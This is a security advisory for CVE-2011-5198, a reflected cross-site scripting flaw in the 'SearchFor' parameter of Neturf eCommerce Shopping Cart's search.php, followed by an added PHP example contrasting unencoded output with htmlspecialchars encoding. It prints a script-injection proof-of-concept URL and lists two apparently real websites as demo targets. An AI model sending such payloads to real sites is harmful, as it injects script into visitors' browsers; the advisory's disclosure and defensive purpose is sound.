Release date:
Updated on: 2012-10-02
Affected Systems:
Neturf eCommerce Shopping Cart
Description:
--------------------------------------------------------------------------------
CVE (CAN) ID: CVE-2011-5198
Neturf eCommerce Shopping Cart is a web-based shopping cart application.
Neturf eCommerce Shopping Cart does not properly filter input passed to the "SearchFor" parameter in search.php before it is returned to the user. Attackers can execute arbitrary HTML and script code in a user's browser in the context of the affected site.
<* Source: farbodmahini
Link: http://secunia.com/advisories/47354
http://packetstormsecurity.org/files/108231/neturf-xss.txt
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
# Exploit:
#
# http://target.com/search.php?SearchFor=<script>alert(/farbodmahini/)</script>
#
#
# Demo:
#
# www.neturf.com/search.php?SearchFor=<script>alert(/farbodmahini/)</script>
# www.darkhorseobservatory.org/search.php?SearchFor=<script>alert(/farbodmahini/)</script>
#
Suggestion:
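The following is an added example, not taken from the advisory or from the vendor: it shows the reflection pattern described above next to an output-encoded version. The source of search.php is not shown on this page, so the markup and the function names (`render_results_unsafe`, `render_results_safe`, `read_search_param`, `h`) are hypothetical.

```php
<?php
// Added illustration. Function names and markup are assumptions; only the
// "SearchFor" parameter name comes from the advisory.

// Pattern the advisory describes: the parameter is copied into the HTML
// response as-is, so markup in the value is parsed by the browser.
function render_results_unsafe(string $searchFor): string
{
    return '<p>Results for: ' . $searchFor . '</p>'
         . '<input type="text" name="SearchFor" value="' . $searchFor . '">';
}

// Encode for the HTML context at output time. ENT_QUOTES encodes both quote
// styles so the value cannot close an attribute; ENT_SUBSTITUTE replaces
// invalid UTF-8 instead of returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened form: every place the value is reflected goes through h().
function render_results_safe(string $searchFor): string
{
    return '<p>Results for: ' . h($searchFor) . '</p>'
         . '<input type="text" name="SearchFor" value="' . h($searchFor) . '">';
}

// Read the parameter defensively: PHP turns "SearchFor[]=x" into an array,
// which is treated here as an empty search rather than passed along.
function read_search_param(array $query): string
{
    $raw = $query['SearchFor'] ?? '';
    return is_string($raw) ? $raw : '';
}

// Constructed sample requests (stand-ins for $_GET).
$samples = [
    ['SearchFor' => '<script>alert(/farbodmahini/)</script>'],
    ['SearchFor' => 'blue "widget"'],
    ['SearchFor' => ['unexpected', 'array']],
];

foreach ($samples as $query) {
    $term = read_search_param($query);
    echo "unsafe: ", render_results_unsafe($term), "\n";
    echo "safe:   ", render_results_safe($term), "\n\n";
}
```

In the encoded output the angle brackets and quotes appear as entities (`&lt;`, `&gt;`, `&quot;`), so the browser displays the search term as text instead of interpreting it.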